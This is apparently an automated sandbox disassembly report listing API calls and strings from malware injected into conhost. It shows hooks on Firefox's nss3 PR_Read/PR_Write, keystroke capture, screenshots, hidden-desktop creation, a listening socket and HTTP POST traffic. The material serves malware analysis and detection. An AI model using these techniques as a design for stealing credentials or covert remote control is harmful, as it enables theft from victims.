GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000C20A9), ref: 000BC125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 000BC132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 000BC13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 000BC14C

Part of subcall function 000BBE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,000BC160,000D2360), ref: 000BBE72

Part of subcall function 000CB58C: InitializeCriticalSection.KERNEL32(000D3FE4,76C61857,000BC185,000D2360), ref: 000CB5A2
Part of subcall function 000CB58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 000CB5DE
Part of subcall function 000CB58C: GetProcAddress.KERNEL32(PR_SetError), ref: 000CB5F0
Part of subcall function 000CB58C: GetProcAddress.KERNEL32(PR_GetError), ref: 000CB602

Strings

PR_Write, xrefs: 000BC141
nss3.dll, xrefs: 000BC10C
PR_Read, xrefs: 000BC134
PR_Close, xrefs: 000BC127
PR_OpenTCPSocket, xrefs: 000BC11F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B5C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 000BDCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 000BDCBD

GetWindowThreadProcessId.USER32(?,?), ref: 000B5CB4
ResetEvent.KERNEL32(00000010), ref: 000B5D03
PostMessageW.USER32(?,?,?,00000010), ref: 000B5D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 000B5D35

Part of subcall function 000B5B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 000B5B40
Part of subcall function 000B5B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 000B5B9A
Part of subcall function 000B5B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 000B5BD6
Part of subcall function 000B5B28: TerminateProcess.KERNEL32(?,00000000), ref: 000B5BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 000B5D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 000B5D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 000B5D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 000B5DA7

Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DD9
Part of subcall function 000C4DCA: CloseHandle.KERNEL32(00000000), ref: 000C4DE2

IntersectRect.USER32(?,?), ref: 000B5DC7
FillRect.USER32(?,?,00000006), ref: 000B5DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 000B5DED

Part of subcall function 000C7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 000C7AB5

Part of subcall function 000C6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,000C2E87,?,19367401,?,00000001,8889347B,00000002), ref: 000C6BA9
Part of subcall function 000C6B9E: CloseHandle.KERNEL32(00000000), ref: 000C6BB4

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BB5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 000C7AF0: WindowFromPoint.USER32(?,?), ref: 000C7B0C
Part of subcall function 000C7AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 000C7B3D
Part of subcall function 000C7AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 000C7B61
Part of subcall function 000C7AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C7B72
Part of subcall function 000C7AF0: GetWindowLongW.USER32(?,000000F0), ref: 000C7B8F
Part of subcall function 000C7AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C7B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 000BB6B6
GetParent.USER32(00000000), ref: 000BB6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 000BB6FD
IsWindow.USER32(?), ref: 000BB720

Part of subcall function 000BB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB0B3
Part of subcall function 000BB0AD: ReleaseMutex.KERNEL32(?), ref: 000BB0E7
Part of subcall function 000BB0AD: IsWindow.USER32(?), ref: 000BB0EE
Part of subcall function 000BB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 000BB108
Part of subcall function 000BB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 000BB110

GetWindowInfo.USER32(00000000,?), ref: 000BB770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 000BB8AD

Part of subcall function 000BB31C: GetAncestor.USER32(?,00000002), ref: 000BB345
Part of subcall function 000BB31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 000BB370
Part of subcall function 000BB31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 000BB3B2
Part of subcall function 000BB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BB448
Part of subcall function 000BB31C: PostMessageW.USER32(?,00000112,?,?), ref: 000BB49B
Part of subcall function 000BB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BB4DA

Part of subcall function 000BDCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 000BDCBD

Part of subcall function 000BB11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB130
Part of subcall function 000BB11C: ReleaseMutex.KERNEL32(?), ref: 000BB14F
Part of subcall function 000BB11C: GetWindowRect.USER32(?,?), ref: 000BB15C
Part of subcall function 000BB11C: IsRectEmpty.USER32(?), ref: 000BB1E0
Part of subcall function 000BB11C: GetWindowLongW.USER32(?,000000F0), ref: 000BB1EF
Part of subcall function 000BB11C: GetParent.USER32(?), ref: 000BB205
Part of subcall function 000BB11C: MapWindowPoints.USER32(00000000,00000000), ref: 000BB20E
Part of subcall function 000BB11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 000BB232

Strings

, xrefs: 000BB654
<, xrefs: 000BB769
@, xrefs: 000BB806

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B4DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 000B4E28
CloseHandle.KERNEL32(?), ref: 000B4F89

Part of subcall function 000BE959: CreateMutexW.KERNELBASE(000D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,000B4E69,?,?,?,743C152E,00000002), ref: 000BE97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 000B4EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 000B4EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 000B4F1A

Part of subcall function 000C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000C67CC

Part of subcall function 000C4DF0: CreateThread.KERNEL32(00000000,?,00000000,000B748F,00000000,000B748F), ref: 000C4E04
Part of subcall function 000C4DF0: CloseHandle.KERNEL32(00000000), ref: 000C4E0F

accept.WS2_32(?,00000000,00000000), ref: 000B4F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 000B4F59

Part of subcall function 000C675E: shutdown.WS2_32(?,00000002), ref: 000C6766
Part of subcall function 000C675E: #3.WS2_32(?), ref: 000C676D

CloseHandle.KERNEL32(?), ref: 000B4F7A

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Part of subcall function 000BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 000BE8E0

Part of subcall function 000B4C68: getsockname.WS2_32(?,?,?), ref: 000B4CBE
Part of subcall function 000B4C68: CloseHandle.KERNEL32(?), ref: 000B4CE2

Strings

K2w, xrefs: 000B4EC7

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CD865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 000CD88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 000CD89D
GetProcessWindowStation.USER32 ref: 000CD8AE

Part of subcall function 000CD83D: GetProcessWindowStation.USER32 ref: 000CD841
Part of subcall function 000CD83D: SetProcessWindowStation.USER32(00000000), ref: 000CD855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 000CD8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 000CD8FD
GetCurrentThreadId.KERNEL32(?,?,?,000B731A,?,2937498D,?,00000000), ref: 000CD909
GetThreadDesktop.USER32(00000000), ref: 000CD910

Part of subcall function 000CD7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,000CD84D,00000000,?,?,?,000B731A,?,2937498D,?), ref: 000CD81D

SetThreadDesktop.USER32(00000000), ref: 000CD922
CloseDesktop.USER32(00000000), ref: 000CD934
CloseWindowStation.USER32(?), ref: 000CD94F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 000B775B
SetThreadPriority.KERNEL32(00000000), ref: 000B7762

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

WaitForSingleObject.KERNEL32(0000EA60), ref: 000B7780

Part of subcall function 000C9A9E: RegOpenKeyExW.ADVAPI32(80000001,000D3EC0,00000000,00000001,?), ref: 000C9ADD

CreateMutexW.KERNEL32(000D2C30,00000001,?,20000000), ref: 000B7843
GetLastError.KERNEL32 ref: 000B7853
CloseHandle.KERNEL32(00000000), ref: 000B7861

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

Part of subcall function 000C4DF0: CreateThread.KERNEL32(00000000,?,00000000,000B748F,00000000,000B748F), ref: 000C4E04
Part of subcall function 000C4DF0: CloseHandle.KERNEL32(00000000), ref: 000C4E0F

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 000B7919

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Strings

Global\%08X%08X%08X, xrefs: 000B781D

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CC912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 000CC929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,000CD2A8), ref: 000CC955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?), ref: 000CC96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?), ref: 000CC984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?,00000000), ref: 000CCA0D

Part of subcall function 000C4A87: GetCurrentThread.KERNEL32(00000020,00000000,000CC9A1,00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A97
Part of subcall function 000C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A9E
Part of subcall function 000C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,000CC9A1,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4AB0
Part of subcall function 000C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,000CC9A1,?), ref: 000C4AD4
Part of subcall function 000C4A87: AdjustTokenPrivileges.ADVAPI32(000CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 000C4AE9
Part of subcall function 000C4A87: GetLastError.KERNEL32 ref: 000C4AF3
Part of subcall function 000C4A87: CloseHandle.KERNEL32(000CC9A1), ref: 000C4B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,000CD2A8,?,?,00000000), ref: 000CC9A1

Part of subcall function 000CC8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,000CC9FB,00000000,?,?,?), ref: 000CC8C6
Part of subcall function 000CC8A1: CloseHandle.KERNEL32(?), ref: 000CC907

Strings

.exe, xrefs: 000CC93B
SeTcbPrivilege, xrefs: 000CC997

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C50A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,000D2000,8404F700,00000000), ref: 000C50EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 000C5112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 000C5137
InternetCloseHandle.WININET(00000000), ref: 000C514F

Strings

HTTP/1.1, xrefs: 000C50DF
GET, xrefs: 000C50D0, 000C50E7
Connection: close, xrefs: 000C5103, 000C5110
POST, xrefs: 000C50C9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CBD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

EnterCriticalSection.KERNEL32(000D3FE4), ref: 000CBDB7
LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CBDE5
EnterCriticalSection.KERNEL32(000D3FE4), ref: 000CBE09

Part of subcall function 000C14C3: InternetCrackUrlA.WININET ref: 000C17AC
Part of subcall function 000C14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000C17CA
Part of subcall function 000C14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000C18E4
Part of subcall function 000C14C3: EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1910
Part of subcall function 000C14C3: LeaveCriticalSection.KERNEL32(000D2AC8,?,?), ref: 000C194D

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

Part of subcall function 000C835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 000C83B8

Part of subcall function 000C40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 000C410D

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

LeaveCriticalSection.KERNEL32(000D3FE4,00000000,?,00000000), ref: 000CC04C

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC06B
LeaveCriticalSection.KERNEL32(000D3FE4), ref: 000CC078

Strings

0, xrefs: 000CBF31
Content-Length, xrefs: 000CBF55
%x, xrefs: 000CBF11

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B9489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 000C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,000B7194,?,?,00000104,.exe,00000000), ref: 000C74F4
Part of subcall function 000C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,000B7194,?,?,00000104), ref: 000C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 000B94EF

Part of subcall function 000B929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000B92D4
Part of subcall function 000B929D: StrStrIW.SHLWAPI(?,?), ref: 000B935C
Part of subcall function 000B929D: StrStrIW.SHLWAPI(?,?), ref: 000B936D
Part of subcall function 000B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B9389
Part of subcall function 000B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 000B93A7
Part of subcall function 000B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B93C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 000B950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000B9582

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 000B961F

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

$, xrefs: 000B9552
#, xrefs: 000B9567
&, xrefs: 000B9560

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CAEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 000CB053

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

EnterCriticalSection.KERNEL32(000D3FB4), ref: 000CAF36
LeaveCriticalSection.KERNEL32(000D3FB4), ref: 000CAFD9

Part of subcall function 000BEA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 000BEA43
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 000BEA54
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 000BEA61
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 000BEA6E
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 000BEA7B
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 000BEA88
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 000BEA95
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 000BEAA2
Part of subcall function 000BEA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 000BEAEA
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 000BEAF5
Part of subcall function 000BEA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 000BEB07
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 000BEB12
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 000BEB1E
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 000BEB2B
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 000BEB38
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 000BEB45
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 000BEB52
Part of subcall function 000BEA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 000BEB5F
Part of subcall function 000BEA11: FreeLibrary.KERNEL32(00000000), ref: 000BEE9C
Part of subcall function 000BEA11: FreeLibrary.KERNEL32(?), ref: 000BEEA6
Part of subcall function 000BEA11: FreeLibrary.KERNEL32(00000000), ref: 000BEEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 000CAF9B

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

GetKeyboardState.USER32(?), ref: 000CAFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 000CB01B

Part of subcall function 000CAD5F: EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD7C
Part of subcall function 000CAD5F: LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD9D
Part of subcall function 000CAD5F: EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,?,000CB052,?), ref: 000CADAE
Part of subcall function 000CAD5F: LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAE47

Strings

, xrefs: 000CB039

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CC5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 000CC5ED
EnterCriticalSection.KERNEL32(000D400C), ref: 000CC620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 000CC640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 000CC64C

Part of subcall function 000BC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000C20A9), ref: 000BC111
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000C20A9), ref: 000BC125
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 000BC132
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 000BC13F
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 000BC14C

LeaveCriticalSection.KERNEL32(000D400C), ref: 000CC669

Strings

nspr4.dll, xrefs: 000CC63A
nss3.dll, xrefs: 000CC646

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CB58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(000D3FE4,76C61857,000BC185,000D2360), ref: 000CB5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 000CB5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 000CB5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 000CB602

Strings

PR_SetError, xrefs: 000CB5E0
PR_GetError, xrefs: 000CB5F2
PR_GetNameForIdentity, xrefs: 000CB5BE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B7206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 000C6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 000C6463
Part of subcall function 000C6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,000B7518,?), ref: 000C64B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 000B72EB
SetThreadPriority.KERNEL32(00000000), ref: 000B72F2

Part of subcall function 000CD865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 000CD88A
Part of subcall function 000CD865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 000CD89D
Part of subcall function 000CD865: GetProcessWindowStation.USER32 ref: 000CD8AE
Part of subcall function 000CD865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 000CD8E9
Part of subcall function 000CD865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 000CD8FD
Part of subcall function 000CD865: GetCurrentThreadId.KERNEL32(?,?,?,000B731A,?,2937498D,?,00000000), ref: 000CD909
Part of subcall function 000CD865: GetThreadDesktop.USER32(00000000), ref: 000CD910
Part of subcall function 000CD865: SetThreadDesktop.USER32(00000000), ref: 000CD922
Part of subcall function 000CD865: CloseDesktop.USER32(00000000), ref: 000CD934
Part of subcall function 000CD865: CloseWindowStation.USER32(?), ref: 000CD94F

Part of subcall function 000BDD09: TlsAlloc.KERNEL32(000D2868,00000000,0000018C,00000000,00000000), ref: 000BDD22
Part of subcall function 000BDD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 000BDD4A
Part of subcall function 000BDD09: CreateEventW.KERNEL32(000D2C30,00000001,00000000,?,84889912,?,00000001), ref: 000BDD74
Part of subcall function 000BDD09: CreateMutexW.KERNEL32(000D2C30,00000000,?,18782822,?,00000001), ref: 000BDD97
Part of subcall function 000BDD09: CreateFileMappingW.KERNEL32(00000000,000D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 000BDDC2
Part of subcall function 000BDD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 000BDDD8
Part of subcall function 000BDD09: GetDC.USER32(00000000), ref: 000BDDF5
Part of subcall function 000BDD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 000BDE15
Part of subcall function 000BDD09: GetDeviceCaps.GDI32(?,0000000A), ref: 000BDE1F
Part of subcall function 000BDD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 000BDE32
Part of subcall function 000BDD09: ReleaseDC.USER32(00000000,?), ref: 000BDE56
Part of subcall function 000BDD09: CreateMutexW.KERNEL32(000D2C30,00000000,?,1898B122,?,00000001,000D28B8,?,00000102,000D28A4,000D2E70,00000010,?,?), ref: 000BDF00
Part of subcall function 000BDD09: GetDC.USER32(00000000), ref: 000BDF15
Part of subcall function 000BDD09: CreateCompatibleDC.GDI32(00000000), ref: 000BDF23
Part of subcall function 000BDD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 000BDF3A
Part of subcall function 000BDD09: SelectObject.GDI32(00000000,00000000), ref: 000BDF4D
Part of subcall function 000BDD09: ReleaseDC.USER32(00000000,00000001), ref: 000BDF65

GetShellWindow.USER32 ref: 000B7338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 000B736B

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 000B73CD
CloseHandle.KERNEL32(?), ref: 000B73DD
CloseHandle.KERNEL32(?), ref: 000B73E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 000B73F2

Part of subcall function 000BD4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,000BE1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 000BD714
Part of subcall function 000BD4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 000BD72F
Part of subcall function 000BD4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 000BD7C1
Part of subcall function 000BD4B4: GetSystemMetrics.USER32(00000017), ref: 000BD8DB
